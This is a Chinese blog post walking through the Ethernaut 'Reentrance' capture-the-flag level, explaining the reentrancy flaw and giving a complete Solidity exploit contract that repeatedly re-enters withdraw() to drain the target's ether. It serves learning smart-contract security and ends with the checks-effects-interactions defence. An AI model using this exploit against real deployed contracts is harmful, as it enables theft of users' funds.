ethernaut——Reentrance

最新推荐文章于 2024-10-19 22:48:21 发布
最新推荐文章于 2024-10-19 22:48:21 发布
阅读量111 收藏
点赞数
分类专栏: ethernaut_2023详解 文章标签: 区块链 安全 智能合约
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_78046362/article/details/130715047
版权

第十关:Reentrance

文章目录

本关知识点:

对外部方法调用产生的重入攻击。

1. 题目要求

偷走合约的所有资产

2. 代码功能解读

请添加图片描述

3. 漏洞分析

重入攻击
	在withdraw方法中,合约先将钱发送给对方,然后再扣除余额,我们通过发钱的时候触发回调函数来再次进入合约,完成多次提取相同的余额。

4. 攻击方法

  1. 攻击合约调用withdraw发送取出所有的钱,
  2. 在合约的receivefallback方法中再次进入withdraw,请求的amount为0.01,这样我们可以让合约产生下溢。
  3. 最后查看合约有多少钱,直接withdraw全部调走。

contract Exploit {

  Reentrance victim;

  constructor (address victim_) payable {
    victim = Reentrance(payable(victim_));
  }

  function attack() public payable {
    victim.donate{value: 0.001 ether}(address(this));
    victim.withdraw(0.001 ether);
  }

  receive() external payable{
    if(address(victim).balance != 0 ){
      victim.withdraw(0.001 ether);
    }
  }

  function kill(address to) public {
    selfdestruct(payable(to));
  }

}

5. 攻击调用图

部署的时候记得往合约发送大于0.001ether的金额
攻击成功,我们在受害者合约中的balances很大,且受害者合约余额为0
请添加图片描述
请添加图片描述

6. 知识点分析

重入攻击是最普遍的攻击之一,我们在编写合约的时候,要遵守检查-生效-交互的模式,防止合约被黑客利用。

陵野
关注
专栏目录
Ethernaut靶场学习实践(二)
m0_68764244的博客
10-07 1743
Ethernaut靶场7-12
ethernaut——Fallback
2301_78046362的博客
05-14 172
在本关中,通过对合约的阅读发现,我们的攻击需要触发receive并发送一定的value。
区块链黑客第一讲:重入攻击
weixin_52628792的博客
10-29 1878
区块链骇客专栏第一章,智能合约安全审计必练!
Ethernaut
m0_52030813的博客
11-05 369
1.Hello Ethernaut 分析 第一关更多的是让玩家熟悉靶场的一些语句执行,相当于一个教程,我们根据题目指示往下走即可。 攻击 首先点击关卡下方的按钮,生成新的关卡实例。 实例生成之后打开浏览器控制台(ctrl+shift+i)。根据题目指示,首先输入await contract.info(),随后根据得到的提示一步步往下做。 做到这一步,提示告诉我们如果知道密码就提交到authenticate这个方法,我们输入contract查看合约信息,发现代码中有password函数可以
以太坊中常见的代码安全问题以及在Ethernaut平台解题的演示
不思量
11-11 3555
下面列出了已知的常见的 Solidity 的漏洞类型:
ethernaut 以太坊靶场学习 (1-12)
weixin_30469895的博客
10-11 1311
前言 这个靶场搜集了许多不同的 solidity 开发的问题,通过这个可以入门 区块链安全 Fallback 给出了源码 pragma solidity ^0.4.18; import 'zeppelin-solidity/contracts/ownership/Ownable.sol'; contract Fallback is Ownable { mapping(address =&...
ethernaut——NaughtCoin
2301_78046362的博客
05-20 142
本合约继承了erc20合约,那么我们可以阅读ERC20合约查看可以不用本人直接转账,采用授权给其他人的方法,来提出token。所以,在我们阅读合约的过程中,对继承的合约,或者常见的合约类型进行分析是很重要的一点!切换账户后transferFrom发送所有的token给自己。
ethernaut——Telephone
2301_78046362的博客
05-14 89
【代码】ethernaut——Telephone。
ethernaut——Vault
2301_78046362的博客
05-17 184
合约中私有变量的读取。
ethernaut——CoinFlip
2301_78046362的博客
05-14 218
有时间的朋友可以自己完成十次攻击。不要利用区块中的数据做预测。
ethernaut-ctf-memo:Ethernaut CTF的一些备忘
05-12
ethernaut-ctf-memo Ethernaut CTF的一些备忘: ://ethernaut.zeppelin.solutions 等级 0.你好Ethernaut 1.后备 2.辐射 3.投币 4.电话 5.代币 6.委派 7.力量 8.金库 9.国王 10.再入 11.电梯 12.隐私权...
ethernaut:Web3基于固体的战争游戏
04-28
Ethernaut Ethernaut是一个基于WEB3 /密实度的战争游戏中启发 ,在复仇虚拟机进行播放。 每个级别都是一个需要被“破解”的智能合约。 该游戏既充当有兴趣学习以太坊的人的工具,又是按等级分类历史骇客的一种方式...
ethernaut——Preservation
2301_78046362的博客
05-22 179
在编写智能合约的时候,一定要对自己调用的方法有了解,特别是delegatecall这种不会切换上下文环境的方法,一定要仔细,方式覆盖状态变量。
NFTScan | 10.07~10.13 NFT 市场热点汇总
NFT_Research的博客
10-14 1033
我不知道事情是怎么发生的,但我猜是助记词泄露了。RareShop 是一个面向消费者的 RWA NFT 商品发售平台,为商家和消费者提供全新的购物场景和交互方式,其中包括加密支付、隐私保护、商品预售、礼品赠送、实物交割等功能,为企业和品牌方提供一站式的 Web3 数字化技术解决方案和营销方案。10 月 12 日,据官方消息,OKX 与 Space Nation 联合推出的首个定制 NFT 市场公布了其开发路线图,包括了 NFT 合集聚合,更加丰富的 NFT 检索组件,更好的 OKX Web3 钱包兼容等。
标题:中阳国际:智能化金融平台助力全球化投资
QQ3957533237的博客
10-16 332
中阳国际凭借其全球化的投资视野、智能化的交易平台和专业的风险管理能力,已成为众多投资者信赖的金融平台。未来,中阳国际将继续致力于为投资者提供更为创新、安全的全球化投资解决方案,帮助他们在金融市场中实现财富增值。
理解智能合约区块链在Web3中的运作机制
weixin_44672358的博客
10-14 537
智能合约(Smart Contract)可以被看作是一段能够自我执行的代码,预先设定的条件一旦达成,合约内容便会自动执行。智能合约的概念最早由密码学专家尼克·萨博(Nick Szabo)提出,它旨在通过自动化协议来执行合约内容,从而减少对中介的依赖。
NFT Insider #152:The Sandbox Alpha 第4季开启
BeepCrypto的博客
10-19 313
此外,游戏引入了名为「熔炉」的打造系统,允许玩家定制和强化团队,提升游戏的策略深度。未来,10KTF 的 Wagmi-san 商店将扩展至 Yuga World 的新阶段「Nexus」计划中,项目中的道具也将保持用于 Otherside 元宇宙中的互操作性。此次更新将为玩家带来一个全新的冰雪主题区域,包含两名全新的传奇守护者、新的游戏内容以及更强的装备。在这片炙热的沙漠中,玩家将面对极端的高温和复杂的挑战,完成任务还可以赢得丰厚的奖励。每个任务点都有独特的奖励,包括强化能量、防御和速度的装备。
Chapter 2 - 7. Understanding Congestion in Fibre Channel Fabrics
最新发布
mounter625的专栏
10-19 700
在严重拥塞情况下,主机会出现操作系统层面的问题,例如崩溃和反应迟钝。相反,在因过度使用而出现拥塞时,主机是健康的。在这种情况下,设备请求的数据量超过了其直接连接链路所能发送的数据量。但实际上,慢排空导致的拥塞和过度使用导致的拥塞虽然看起来相似,但根源却不同。所示,在由于慢排空造成的拥塞和由于过度使用造成的拥塞时,对网络结构的影响是相同的。因此,要找到拥塞的原因,就必须找到拥塞的源头。的角度来看,称其为罪魁祸首可能并不完全正确,因为它并没有做任何不该做的事情。的发送速率,因此所连接的交换端口有足够的剩余。
Python知识点:基于Python工具,如何使用Brownie进行智能合约测试
bigorsmallorlarge的专栏
10-14 726
Brownie是一个基于Python的智能合约开发和测试框架,它提供了一套完整的工具来帮助开发者编写、测试和部署智能合约。Brownie是一个功能强大的Python框架,它简化了智能合约的开发和测试过程。通过上述步骤,你可以快速开始使用Brownie来构建和测试你的智能合约。Brownie提供了强大的调试工具,包括Python风格的回溯和自定义错误字符串。这里使用的是本地开发网络,你也可以选择使用其他网络,如Ropsten或主网。目录下,你可以编写你的Solidity智能合约。目录下,你可以创建测试脚本。
智慧链动青春:国家区块链中心接待北京市十一学校青少年访学探索
weixin_55760491的博客
10-14 300
近期国家区块链技术创新中心接待北京市十一学校新生访学,以科普讲座、实操互动的方式让学生在深度思考中感受科学魅力、接触前沿科技,激发学生对区块链、隐私计算和芯片设计制造的探索热情。国家区块链技术创新中心将持续开展相关科普实践活动,为我国科技人才梯队的构建奠定坚实的基础。”浅谈芯片设计与制造“环节为学生设置简易的芯片设计任务让学生深入认识集成电路,打开芯片世界的大门。本次访学”认识区块链“环节带学生了解长安链关键技术及其应用,并体验互动上链流程,让学生理解区块链技术的主要特性及其带来的社会产业变革。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值